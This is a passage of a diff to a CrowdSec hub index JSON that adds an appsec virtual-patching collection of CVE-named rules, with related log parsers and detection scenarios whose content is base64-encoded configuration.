VyaXR5L3ZwYXRjaC1DVkUtMjAyMi00NDg3NwphcHBzZWMtY29uZmlnczoKICAtIGNyb3dkc2VjdXJpdHkvdmlydHVhbC1wYXRjaGluZwpwYXJzZXJzOgogIC0gY3Jvd2RzZWN1cml0eS9hcHBzZWMtbG9ncwpzY2VuYXJpb3M6CiAgLSBjcm93ZHNlY3VyaXR5L2FwcHNlYy12cGF0Y2gKZGVzY3JpcHRpb246ICJhIGdlbmVyaWMgdmlydHVhbCBwYXRjaGluZyBjb2xsZWN0aW9uLCBzdWl0YWJsZSBmb3IgbW9zdCB3ZWIgc2VydmVycy4iCmF1dGhvcjogY3Jvd2RzZWN1cml0eQoK",
+ "description": "a generic virtual patching collection, suitable for most web servers.",
+ "author": "crowdsecurity",
+ "labels": null,
+ "parsers": [
+ "crowdsecurity/appsec-logs"
+ ],
+ "scenarios": [
+ "crowdsecurity/appsec-vpatch"
+ ],
+ "appsec-rules": [
+ "crowdsecurity/base-config",
+ "crowdsecurity/vpatch-env-access",
+ "crowdsecurity/vpatch-CVE-2023-40044",
+ "crowdsecurity/vpatch-CVE-2017-9841",
+ "crowdsecurity/vpatch-CVE-2020-11738",
+ "crowdsecurity/vpatch-CVE-2022-27926",
+ "crowdsecurity/vpatch-CVE-2022-35914",
+ "crowdsecurity/vpatch-CVE-2022-46169",
+ "crowdsecurity/vpatch-CVE-2023-20198",
+ "crowdsecurity/vpatch-CVE-2023-22515",
+ "crowdsecurity/vpatch-CVE-2023-33617",
+ "crowdsecurity/vpatch-CVE-2023-34362",
+ "crowdsecurity/vpatch-CVE-2023-3519",
+ "crowdsecurity/vpatch-CVE-2023-42793",
+ "crowdsecurity/vpatch-CVE-2023-50164",
+ "crowdsecurity/vpatch-CVE-2023-38205",
+ "crowdsecurity/vpatch-CVE-2023-24489",
+ "crowdsecurity/vpatch-CVE-2021-3129",
+ "crowdsecurity/vpatch-CVE-2021-22941",
+ "crowdsecurity/vpatch-CVE-2019-12989",
+ "crowdsecurity/vpatch-CVE-2022-44877"
+ ],
+ "appsec-configs": [
+ "crowdsecurity/virtual-patching"
+ ]
+ },
"crowdsecurity/asterisk": {
"path": "collections/crowdsecurity/asterisk.yaml",
"version": "0.1",
@@ -3206,6 +4010,37 @@
"author": "crowdsecurity",
"labels": null
},
+ "crowdsecurity/appsec-logs": {
+ "path": "parsers/s01-parse/crowdsecurity/appsec-logs.yaml",
+ "stage": "s01-parse",
+ "version": "0.5",
+ "versions": {
+ "0.1": {
+ "digest": "b6de996d25dcbbbda4889fea9e8b05559660c54ea2ed7202430741ef40141179",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "20fe00d38f9756169fb5d56027e5c26085e038f699a18d17be94ad6b0da14447",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "24ea66d28ee00e9bef266b86fc56ed9e7a95e8f36027765b99389f0b4ed8c2d3",
+ "deprecated": false
+ },
+ "0.4": {
+ "digest": "60b45bc8957dfc40f270500b8ef438085294fc172c92332dcb9dcb3c14cc9c85",
+ "deprecated": false
+ },
+ "0.5": {
+ "digest": "e44f2877c363061fef239a9af472253900674bf261e8762febd06d7ef20022a0",
+ "deprecated": false
+ }
+ },
+ "content": "b25zdWNjZXNzOiBuZXh0X3N0YWdlCmZvcm1hdDogMy4wCiNkZWJ1ZzogdHJ1ZQpmaWx0ZXI6ICJldnQuUGFyc2VkLnByb2dyYW0gPT0gJ2FwcHNlYyciCm5hbWU6IGNyb3dkc2VjdXJpdHkvYXBwc2VjLWxvZ3MKZGVzY3JpcHRpb246ICJQYXJzZSBBcHBzZWMgZXZlbnRzIgpzdGF0aWNzOgogIC0gbWV0YTogc2VydmljZQogICAgdmFsdWU6IGFwcHNlYwogIC0gbWV0YTogc291cmNlX2lwCiAgICBleHByZXNzaW9uOiAiZXZ0LlBhcnNlZC5zb3VyY2VfaXAiCiAgLSBtZXRhOiB0YXJnZXRfaG9zdAogICAgZXhwcmVzc2lvbjogImV2dC5QYXJzZWQudGFyZ2V0X2hvc3QiCiAgLSBtZXRhOiByZXF1ZXN0X3V1aWQKICAgIGV4cHJlc3Npb246ICJldnQuUGFyc2VkLnJlcV91dWlkIgogIC0gbWV0YTogdGFyZ2V0X3VyaQogICAgZXhwcmVzc2lvbjogImV2dC5QYXJzZWQudGFyZ2V0X3VyaSIKI3dhcyB0aGUgcmVxdWVzdCBibG9ja2VkID8KICAtIG1ldGE6IGxvZ190eXBlCiAgICBleHByZXNzaW9uOiB8CiAgICAgIGV2dC5BcHBzZWMuSGFzSW5CYW5kTWF0Y2hlcyA/ICJhcHBzZWMtYmxvY2siIDogImFwcHNlYy1pbmZvIgogIC0gbWV0YTogcnVsZV9uYW1lCiAgICBleHByZXNzaW9uOiBldnQuQXBwc2VjLkdldE5hbWUoKQogIC0gbWV0YTogcnVsZV9pZHMKICAgIGV4cHJlc3Npb246IFNwcmludGYoIiUrdiIsIGV2dC5BcHBzZWMuR2V0UnVsZUlEcygpKQogIC0gbWV0YTogcmVtZWRpYXRpb25fY21wdF9pcAogICAgZXhwcmVzc2lvbjogImV2dC5QYXJzZWQucmVtZWRpYXRpb25fY21wdF9pcCIK",
+ "description": "Parse Appsec events",
+ "author": "crowdsecurity",
+ "labels": null
+ },
"crowdsecurity/asterisk-logs": {
"path": "parsers/s01-parse/crowdsecurity/asterisk-logs.yaml",
"stage": "s01-parse",
@@ -3308,7 +4143,7 @@
"crowdsecurity/caddy-logs": {
"path": "parsers/s01-parse/crowdsecurity/caddy-logs.yaml",
"stage": "s01-parse",
- "version": "0.5",
+ "version": "0.6",
"versions": {
"0.1": {
"digest": "30bf81915d8254ab7611c156ddbe0cf389838d471f973403ae1b07fffa5b6d5a",
@@ -3329,10 +4164,14 @@
"0.5": {
"digest": "19673bb9a1ad806c7d615d24c37649f8c0679acb07df9ac304ba23d44eaf0f53",
"deprecated": false
+ },
+ "0.6": {
+ "digest": "856f9882c2aa89d701dce456e97bfb4c5230b7fc83cefc54a8279d7cdac5b8fe",
+ "deprecated": false
}
},
"long_description": "UGFyc2VyIGZvciBjYWRkeSBsb2dzLgpJdCBleHBlY3RzIHRoZSBkZWZhdWx0IGtleSB2YWx1ZXMgZm9yIGNhZGR5IGxvZ3MuCgpZb3UgbmVlZCB0byBzcGVjaWZ5IGNhZGR5IGNvbmZpZyB0byBlbmFibGUgbG9nZ2luZyBpbiBhIGZpbGU6CgpgYGBiYXNoCjo4MCB7CiAgICAgICAgIyBTZXQgdGhpcyBwYXRoIHRvIHlvdXIgc2l0ZSdzIGRpcmVjdG9yeS4KICAgICAgICByb290ICogL3Vzci9zaGFyZS9jYWRkeQoKICAgICAgICAjIEVuYWJsZSB0aGUgc3RhdGljIGZpbGUgc2VydmVyLgogICAgICAgIGZpbGVfc2VydmVyCgogICAgICAgICMgQW5vdGhlciBjb21tb24gdGFzayBpcyB0byBzZXQgdXAgYSByZXZlcnNlIHByb3h5OgogICAgICAgICMgcmV2ZXJzZV9wcm94eSBsb2NhbGhvc3Q6ODA4MAoKICAgICAgICAjIE9yIHNlcnZlIGEgUEhQIHNpdGUgdGhyb3VnaCBwaHAtZnBtOgogICAgICAgICMgcGhwX2Zhc3RjZ2kgbG9jYWxob3N0OjkwMDAKICAgICAgICBsb2cgewogICAgICAgICAgICAgICAgb3V0cHV0IGZpbGUgL3Zhci9sb2cvY2FkZHkvYWNjZXNzLmxvZwogICAgICAgIH0KfQoKYGBgCgpBbmQgdGhlbiBhZGQgaW4gYWNxdWlzaXRpb24gdGhpcyA6CgpgYGB5YW1sCi0tLQpmaWxlbmFtZXM6CiAtIC92YXIvbG9nL2NhZGR5L2FjY2Vzcy5sb2cKbGFiZWxzOgogIHR5cGU6IGNhZGR5CmBgYA==",
- "content": "ZmlsdGVyOiAiZXZ0LlBhcnNlZC5wcm9ncmFtIHN0YXJ0c1dpdGggJ2NhZGR5JyAmJiBVbm1hcnNoYWxKU09OKGV2dC5QYXJzZWQubWVzc2FnZSwgZXZ0LlVubWFyc2hhbGVkLCAnY2FkZHknKSBpbiBbJycsIG5pbF0iCm9uc3VjY2VzczogbmV4dF9zdGFnZQpkZWJ1ZzogdHJ1ZQpuYW1lOiBjcm93ZHNlY3VyaXR5L2NhZGR5LWxvZ3MKZGVzY3JpcHRpb246ICJQYXJzZSBjYWRkeSBsb2dzIgpzdGF0aWNzOgogIC0gbWV0YTogbG9nX3R5cGUKICAgIHZhbHVlOiBodHRwX2FjY2Vzcy1sb2cKICAtIHRhcmdldDogZXZ0LlN0clRpbWUKICAgIGV4cHJlc3Npb246IHwKICAgICAgU3ByaW50ZigiJXYiLCBldnQuVW5tYXJzaGFsZWQuY2FkZHkudHMpIG1hdGNoZXMgJ15bMC05ZVxcLlxcK10rJCcgPyBpbnQoZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnRzKSA6IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS50cwogIC0gbWV0YTogc2VydmljZQogICAgdmFsdWU6IGh0dHAKICAjI0NhZGR5IG5vdyBzZXRzIGNsaWVudF9pcCB0byB0aGUgdmFsdWUgb2YgWC1Gb3J3YXJkZWQtRm9yIGlmIHVzZXJzIHNldHMgdHJ1c3RlZCBwcm94aWVzCiAgLSBwYXJzZWQ6IHJlbW90ZV9pcAogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuY2xpZW50X2lwCiAgLSBwYXJzZWQ6IHJlbW90ZV9hZGRyCiAgICBleHByZXNzaW9uOiAiZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QucmVtb3RlX2FkZHIgIT0gbmlsID8gU3BsaXQoZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QucmVtb3RlX2FkZHIsICc6JylbMF0gOiBuaWwiCiAgLSBtZXRhOiBzb3VyY2VfaXAKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQucmVtb3RlX2lwCiAgLSBtZXRhOiBodHRwX3N0YXR1cwogICAgZXhwcmVzc2lvbjogaW50KGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5zdGF0dXMpCiAgLSBtZXRhOiBodHRwX3BhdGgKICAgIGV4cHJlc3Npb246IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5yZXF1ZXN0LnVyaQogIC0gcGFyc2VkOiByZXF1ZXN0ICNBZGQgZm9yIGh0dHAtbG9ncyBlbnJpY2hlcgogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QudXJpCiAgLSBwYXJzZWQ6IHZlcmIKICAgIGV4cHJlc3Npb246IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5yZXF1ZXN0Lm1ldGhvZAogIC0gbWV0YTogaHR0cF92ZXJiCiAgICBleHByZXNzaW9uOiBldnQuVW5tYXJzaGFsZWQuY2FkZHkucmVxdWVzdC5tZXRob2QKICAtIHBhcnNlZDogaHR0cF91c2VyX2FnZW50CiAgICBleHByZXNzaW9uOiBldnQuVW5tYXJzaGFsZWQuY2FkZHkucmVxdWVzdC5oZWFkZXJzWydVc2VyLUFnZW50J11bMF0KICAtIG1ldGE6IGh0dHBfdXNlcl9hZ2VudAogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuaGVhZGVyc1snVXNlci1BZ2VudCddWzBdCiAgLSBtZXRhOiB0YXJnZXRfZnFkbgogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuaG9zdAogIC0gbWV0YTogc3ViX3R5cGUKICAgIGV4cHJlc3Npb246ICJldnQuTWV0YS5odHRwX3N0YXR1cyA9PSAnNDAxJyAmJiBldnQuVW5tYXJzaGFsZWQucmVxdWVzdC5oZWFkZXJzLkF1dGhvcml6YXRpb24gc3RhcnRzV2l0aCAnQmFzaWMgJyA/ICdhdXRoX2ZhaWwnIDogJyci",
+ "content": "ZmlsdGVyOiAiZXZ0LlBhcnNlZC5wcm9ncmFtIHN0YXJ0c1dpdGggJ2NhZGR5JyAmJiBVbm1hcnNoYWxKU09OKGV2dC5QYXJzZWQubWVzc2FnZSwgZXZ0LlVubWFyc2hhbGVkLCAnY2FkZHknKSBpbiBbJycsIG5pbF0iCm9uc3VjY2VzczogbmV4dF9zdGFnZQpuYW1lOiBjcm93ZHNlY3VyaXR5L2NhZGR5LWxvZ3MKZGVzY3JpcHRpb246ICJQYXJzZSBjYWRkeSBsb2dzIgpzdGF0aWNzOgogIC0gbWV0YTogbG9nX3R5cGUKICAgIHZhbHVlOiBodHRwX2FjY2Vzcy1sb2cKICAtIHRhcmdldDogZXZ0LlN0clRpbWUKICAgIGV4cHJlc3Npb246IHwKICAgICAgU3ByaW50ZigiJXYiLCBldnQuVW5tYXJzaGFsZWQuY2FkZHkudHMpIG1hdGNoZXMgJ15bMC05ZVxcLlxcK10rJCcgPyBpbnQoZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnRzKSA6IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS50cwogIC0gbWV0YTogc2VydmljZQogICAgdmFsdWU6IGh0dHAKICAjI0NhZGR5IG5vdyBzZXRzIGNsaWVudF9pcCB0byB0aGUgdmFsdWUgb2YgWC1Gb3J3YXJkZWQtRm9yIGlmIHVzZXJzIHNldHMgdHJ1c3RlZCBwcm94aWVzCiAgLSBwYXJzZWQ6IHJlbW90ZV9pcAogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuY2xpZW50X2lwCiAgLSBwYXJzZWQ6IHJlbW90ZV9hZGRyCiAgICBleHByZXNzaW9uOiAiZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QucmVtb3RlX2FkZHIgIT0gbmlsID8gU3BsaXQoZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QucmVtb3RlX2FkZHIsICc6JylbMF0gOiBuaWwiCiAgLSBtZXRhOiBzb3VyY2VfaXAKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQucmVtb3RlX2lwCiAgLSBtZXRhOiBodHRwX3N0YXR1cwogICAgZXhwcmVzc2lvbjogaW50KGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5zdGF0dXMpCiAgLSBtZXRhOiBodHRwX3BhdGgKICAgIGV4cHJlc3Npb246IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5yZXF1ZXN0LnVyaQogIC0gcGFyc2VkOiByZXF1ZXN0ICNBZGQgZm9yIGh0dHAtbG9ncyBlbnJpY2hlcgogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QudXJpCiAgLSBwYXJzZWQ6IHZlcmIKICAgIGV4cHJlc3Npb246IGV2dC5Vbm1hcnNoYWxlZC5jYWRkeS5yZXF1ZXN0Lm1ldGhvZAogIC0gbWV0YTogaHR0cF92ZXJiCiAgICBleHByZXNzaW9uOiBldnQuVW5tYXJzaGFsZWQuY2FkZHkucmVxdWVzdC5tZXRob2QKICAtIHBhcnNlZDogaHR0cF91c2VyX2FnZW50CiAgICBleHByZXNzaW9uOiBldnQuVW5tYXJzaGFsZWQuY2FkZHkucmVxdWVzdC5oZWFkZXJzWydVc2VyLUFnZW50J11bMF0KICAtIG1ldGE6IGh0dHBfdXNlcl9hZ2VudAogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuaGVhZGVyc1snVXNlci1BZ2VudCddWzBdCiAgLSBtZXRhOiB0YXJnZXRfZnFkbgogICAgZXhwcmVzc2lvbjogZXZ0LlVubWFyc2hhbGVkLmNhZGR5LnJlcXVlc3QuaG9zdAogIC0gbWV0YTogc3ViX3R5cGUKICAgIGV4cHJlc3Npb246ICJldnQuTWV0YS5odHRwX3N0YXR1cyA9PSAnNDAxJyAmJiBldnQuVW5tYXJzaGFsZWQucmVxdWVzdC5oZWFkZXJzLkF1dGhvcml6YXRpb24gc3RhcnRzV2l0aCAnQmFzaWMgJyA/ICdhdXRoX2ZhaWwnIDogJyci",
"description": "Parse caddy logs",
"author": "crowdsecurity",
"labels": null
@@ -4290,7 +5129,7 @@
"crowdsecurity/palo-alto-threat-log": {
"path": "parsers/s01-parse/crowdsecurity/palo-alto-threat-log.yaml",
"stage": "s01-parse",
- "version": "0.2",
+ "version": "0.3",
"versions": {
"0.1": {
"digest": "7a9d62f00f202417325dcfac25efc34e5caaa78b469486977967ced0d0ec6cb1",
@@ -4299,10 +5138,14 @@
"0.2": {
"digest": "8e2ef39c33263f3b2bdca6e6936a61de1a84a4bc7ad741626b31b9f19d2304b7",
"deprecated": false
+ },
+ "0.3": {
+ "digest": "a2f3c15040301cdbbf75233c123d089be2380401de5f335b08275929a2f45974",
+ "deprecated": false
}
},
"long_description": "IyMgUGFsbyBBbHRvIFRocmVhdCBMb2cgUGFyc2VyCgoKUGFyc2UgUGFsbyBBbHRvIFRocmVhdCBMb2cuCk1vcmUgaW5mb3JtYXRpb24gaW4gW1BhbG8gQWx0byBEb2N1bWVudGF0aW9uXShodHRwczovL2RvY3MucGFsb2FsdG9uZXR3b3Jrcy5jb20vcGFuLW9zLzktMS9wYW4tb3MtYWRtaW4vbW9uaXRvcmluZy91c2Utc3lzbG9nLWZvci1tb25pdG9yaW5nL3N5c2xvZy1maWVsZC1kZXNjcmlwdGlvbnMvdGhyZWF0LWxvZy1maWVsZHMp",
- "content": "b25zdWNjZXNzOiBuZXh0X3N0YWdlCmRlYnVnOiB0cnVlCm5hbWU6IGNyb3dkc2VjdXJpdHkvcGFsby1hbHRvLXRocmVhdC1sb2cKZGVzY3JpcHRpb246ICJQYXJzZSBwYWxvLWFsdG8tdGhyZWF0LWxvZyBsb2dzIgpmaWx0ZXI6ICJldnQuUGFyc2VkLnByb2dyYW0gPT0gJ3BhbG8tYWx0by10aHJlYXQnIgpwYXR0ZXJuX3N5bnRheDoKICBQQU5fVElNRVNUQU1QOiAiJXtZRUFSfS8le01PTlRITlVNfS8le01PTlRIREFZfSAle0hPVVJ9OiV7TUlOVVRFfTole0lOVH0iCm5vZGVzOgogIC0gZ3JvazoKICAgICAgcGF0dGVybjogJygle1RJTUVTVEFNUF9JU084NjAxOnN5c2xvZ190aW1lc3RhbXB9ICk/JXtTWVNMT0dIT1NUOnN5c2xvZ19ob3N0bmFtZX0gJXtEQVRBOnBhbl9yZXNlcnZlZH0sJXtEQVRBfSwle1dPUkQ6c2VyaWFsX251bWJlcn0sJXtXT1JEOmxvZ190eXBlfSwle1dPUkQ6bG9nX3N1YnR5cGV9LCV7REFUQTpwYW5fdW5rbm93bn0sJXtQQU5fVElNRVNUQU1QOmdlbmVyYXRpb25fdGltZXN0YW1wfSwle0lQOnNyY19pcH0sJXtJUDpkc3RfaXB9LCV7SVA6bmF0X3NyY19pcH0sJXtJUDpuYXRfZHN0X2lwfSwle0RBVEE6cnVsZX0sJXtEQVRBOnNyY191c2VyfSwle0RBVEE6ZHN0X3VzZXJ9LCV7REFUQTphcHB9LCV7REFUQTp2c3lzfSwle0RBVEE6c3JjX3pvbmV9LCV7REFUQTpkc3Rfem9uZX0sJXtEQVRBOmluZ3Jlc3NfaW50fSwle0RBVEE6ZWdyZXNzX2ludH0sJXtEQVRBOmxvZ19md2RfcHJvZmlsZX0sJXtEQVRBfSwle0RBVEE6c2Vzc2lvbl9pZH0sJXtEQVRBOnJlcGVhdF9jb3VudH0sJXtEQVRBOnNyY19wb3J0fSwle0RBVEE6ZHN0X3BvcnR9LCV7REFUQTpuYXRfc3JjX3BvcnR9LCV7REFUQTpuYXRfZHN0X3BvcnR9LCV7REFUQTpwYW5fbG9nX2ZsYWdzfSwle0RBVEE6aXBfcHJvdG99LCV7REFUQTphY3Rpb259LCgiJXtEQVRBOnVybF9vcl9maWxlbmFtZX0iKT8sJXtEQVRBOnRocmVhdF9pZH0sJXtEQVRBOnVybF9jYXRlZ29yeV9vcl93aWxkZmlyZV92ZXJkaWN0fSwle0RBVEE6c2V2ZXJpdHl9LCV7REFUQTpkaXJlY3Rpb259LCV7REFUQTpsb2dfc2VxX251bX0sJXtEQVRBOmZ3ZF90b19wYW5vcmFtYX0sJXtEQVRBOnNyY19jb3VudHJ5fSwle0RBVEE6ZHN0X2NvdW50cnl9LCV7REFUQTpodHRwX2NvbnRlbnRfdHlwZX0sJXtEQVRBOnBjYXBfaWR9LCV7REFUQTpmaWxlX2hhc2h9LCV7REFUQTp3aWxkZmlyZV9zZXJ2ZXJ9LCV7R1JFRURZREFUQTp1bnBhcnNlZF9kYXRhfScKICAgICAgYXBwbHlfb246IG1lc3NhZ2UKc3RhdGljczoKICAtIHRhcmdldDogZXZ0LlN0clRpbWUKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQuc3lzbG9nX3RpbWVzdGFtcAogIC0gbWV0YTogbG9nX3R5cGUKICAgIHZhbHVlOiBwYWxvX2FsdG8KICAtIG1ldGE6IHNvdXJjZV9pcAogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC5zcmNfaXAKICAtIG1ldGE6IHNldmVyaXR5CiAgICBleHByZXNzaW9uOiBldnQuUGFyc2VkLnNldmVyaXR5CiAgLSBtZXRhOiB0aHJlYXRfaWQKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQudGhyZWF0X2lkCiAgLSBtZXRhOiBkZXN0aW5hdGlvbl9sb2NhdGlvbgogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC5kc3RfY291bnRyeQogIC0gbWV0YTogc291cmNlX2xvY2F0aW9uCiAgICBleHByZXNzaW9uOiBldnQuUGFyc2VkLnNyY19jb3VudHJ5CiAgLSBtZXRhOiBydWxlX25hbWUKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQucnVsZQogIC0gbWV0YTogYXBwbGljYXRpb24KICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQuYXBwCiAgLSBtZXRhOiB0aHJlYXRfdHlwZQogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC50aHJlYXRfaWQK",
+ "content": "b25zdWNjZXNzOiBuZXh0X3N0YWdlCm5hbWU6IGNyb3dkc2VjdXJpdHkvcGFsby1hbHRvLXRocmVhdC1sb2cKZGVzY3JpcHRpb246ICJQYXJzZSBwYWxvLWFsdG8tdGhyZWF0LWxvZyBsb2dzIgpmaWx0ZXI6ICJldnQuUGFyc2VkLnByb2dyYW0gPT0gJ3BhbG8tYWx0by10aHJlYXQnIgpwYXR0ZXJuX3N5bnRheDoKICBQQU5fVElNRVNUQU1QOiAiJXtZRUFSfS8le01PTlRITlVNfS8le01PTlRIREFZfSAle0hPVVJ9OiV7TUlOVVRFfTole0lOVH0iCm5vZGVzOgogIC0gZ3JvazoKICAgICAgcGF0dGVybjogJygle1RJTUVTVEFNUF9JU084NjAxOnN5c2xvZ190aW1lc3RhbXB9ICk/JXtTWVNMT0dIT1NUOnN5c2xvZ19ob3N0bmFtZX0gJXtEQVRBOnBhbl9yZXNlcnZlZH0sJXtEQVRBfSwle1dPUkQ6c2VyaWFsX251bWJlcn0sJXtXT1JEOmxvZ190eXBlfSwle1dPUkQ6bG9nX3N1YnR5cGV9LCV7REFUQTpwYW5fdW5rbm93bn0sJXtQQU5fVElNRVNUQU1QOmdlbmVyYXRpb25fdGltZXN0YW1wfSwle0lQOnNyY19pcH0sJXtJUDpkc3RfaXB9LCV7SVA6bmF0X3NyY19pcH0sJXtJUDpuYXRfZHN0X2lwfSwle0RBVEE6cnVsZX0sJXtEQVRBOnNyY191c2VyfSwle0RBVEE6ZHN0X3VzZXJ9LCV7REFUQTphcHB9LCV7REFUQTp2c3lzfSwle0RBVEE6c3JjX3pvbmV9LCV7REFUQTpkc3Rfem9uZX0sJXtEQVRBOmluZ3Jlc3NfaW50fSwle0RBVEE6ZWdyZXNzX2ludH0sJXtEQVRBOmxvZ19md2RfcHJvZmlsZX0sJXtEQVRBfSwle0RBVEE6c2Vzc2lvbl9pZH0sJXtEQVRBOnJlcGVhdF9jb3VudH0sJXtEQVRBOnNyY19wb3J0fSwle0RBVEE6ZHN0X3BvcnR9LCV7REFUQTpuYXRfc3JjX3BvcnR9LCV7REFUQTpuYXRfZHN0X3BvcnR9LCV7REFUQTpwYW5fbG9nX2ZsYWdzfSwle0RBVEE6aXBfcHJvdG99LCV7REFUQTphY3Rpb259LCgiJXtEQVRBOnVybF9vcl9maWxlbmFtZX0iKT8sJXtEQVRBOnRocmVhdF9pZH0sJXtEQVRBOnVybF9jYXRlZ29yeV9vcl93aWxkZmlyZV92ZXJkaWN0fSwle0RBVEE6c2V2ZXJpdHl9LCV7REFUQTpkaXJlY3Rpb259LCV7REFUQTpsb2dfc2VxX251bX0sJXtEQVRBOmZ3ZF90b19wYW5vcmFtYX0sJXtEQVRBOnNyY19jb3VudHJ5fSwle0RBVEE6ZHN0X2NvdW50cnl9LCV7REFUQTpodHRwX2NvbnRlbnRfdHlwZX0sJXtEQVRBOnBjYXBfaWR9LCV7REFUQTpmaWxlX2hhc2h9LCV7REFUQTp3aWxkZmlyZV9zZXJ2ZXJ9LCV7R1JFRURZREFUQTp1bnBhcnNlZF9kYXRhfScKICAgICAgYXBwbHlfb246IG1lc3NhZ2UKc3RhdGljczoKICAtIHRhcmdldDogZXZ0LlN0clRpbWUKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQuc3lzbG9nX3RpbWVzdGFtcAogIC0gbWV0YTogbG9nX3R5cGUKICAgIHZhbHVlOiBwYWxvX2FsdG8KICAtIG1ldGE6IHNvdXJjZV9pcAogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC5zcmNfaXAKICAtIG1ldGE6IHNldmVyaXR5CiAgICBleHByZXNzaW9uOiBldnQuUGFyc2VkLnNldmVyaXR5CiAgLSBtZXRhOiB0aHJlYXRfaWQKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQudGhyZWF0X2lkCiAgLSBtZXRhOiBkZXN0aW5hdGlvbl9sb2NhdGlvbgogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC5kc3RfY291bnRyeQogIC0gbWV0YTogc291cmNlX2xvY2F0aW9uCiAgICBleHByZXNzaW9uOiBldnQuUGFyc2VkLnNyY19jb3VudHJ5CiAgLSBtZXRhOiBydWxlX25hbWUKICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQucnVsZQogIC0gbWV0YTogYXBwbGljYXRpb24KICAgIGV4cHJlc3Npb246IGV2dC5QYXJzZWQuYXBwCiAgLSBtZXRhOiB0aHJlYXRfdHlwZQogICAgZXhwcmVzc2lvbjogZXZ0LlBhcnNlZC50aHJlYXRfaWQK",
"description": "Parse palo-alto-threat-log logs",
"author": "crowdsecurity",
"labels": null
@@ -6945,6 +7788,38 @@
"spoofable": 0
}
},
+ "crowdsecurity/appsec-vpatch": {
+ "path": "scenarios/crowdsecurity/appsec-vpatch.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "6da853b06b3fb716d6094ebdf881df90d27239637ff3389b202b0077eda7acea",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "f43baacd1a6756c8d6c51f632ad52871708b4176d490d77975491fd1c55a8e3d",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "7e5f221a8a725d96df1ba2f6e32de34e02dc98abbb9598e72095ad0db94d6a13",
+ "deprecated": false
+ }
+ },
+ "content": "dHlwZTogbGVha3kKZm9ybWF0OiAzLjAKbmFtZTogY3Jvd2RzZWN1cml0eS9hcHBzZWMtdnBhdGNoCmRlc2NyaXB0aW9uOiAiRGV0ZWN0IGFwcHNlYyBhdHRhY2tzIgpmaWx0ZXI6ICJldnQuTWV0YS5sb2dfdHlwZSA9PSAnYXBwc2VjLWJsb2NrJyIKZGlzdGluY3Q6IGV2dC5NZXRhLnJ1bGVfbmFtZQpsZWFrc3BlZWQ6ICI2MHMiCmNhcGFjaXR5OiAxCmdyb3VwYnk6IGV2dC5NZXRhLnNvdXJjZV9pcApibGFja2hvbGU6IDFtCmxhYmVsczoKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGNsYXNzaWZpY2F0aW9uOgogICAgLSBhdHRhY2suVDExMTAKICBsYWJlbDogImFwcHNlYyBibG9ja2VkIgogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIHJlbWVkaWF0aW9uOiB0cnVlCg==",
+ "description": "Detect appsec attacks",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "attack.T1110"
+ ],
+ "confidence": 3,
+ "label": "appsec blocked",
+ "remediation": true,
+ "service": "http",
+ "spoofable": 0
+ }
+ },
"crowdsecurity/asterisk_bf": {
"path": "scenarios/crowdsecurity/asterisk_bf.yaml",
"version": "0.2",
@@ -7935,6 +8810,63 @@
"spoofable": 0
}
},
+ "crowdsecurity/crowdsec-appsec-inband": {
+ "path": "scenarios/crowdsecurity/crowdsec-appsec-inband.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "bf202b09575fe406d17ff9cf267cfc81d228bc0575038a8ae91a137ed4405b58",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "0d0bcfec8fb567aa86271f3e5c45feb16c6091f2c52c32db629117b0bba0e793",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "71213c8536a1e04b36fe2e207ffec099982e78cf7d3ed6a8ecd26440f47cb1c0",
+ "deprecated": false
+ }
+ },
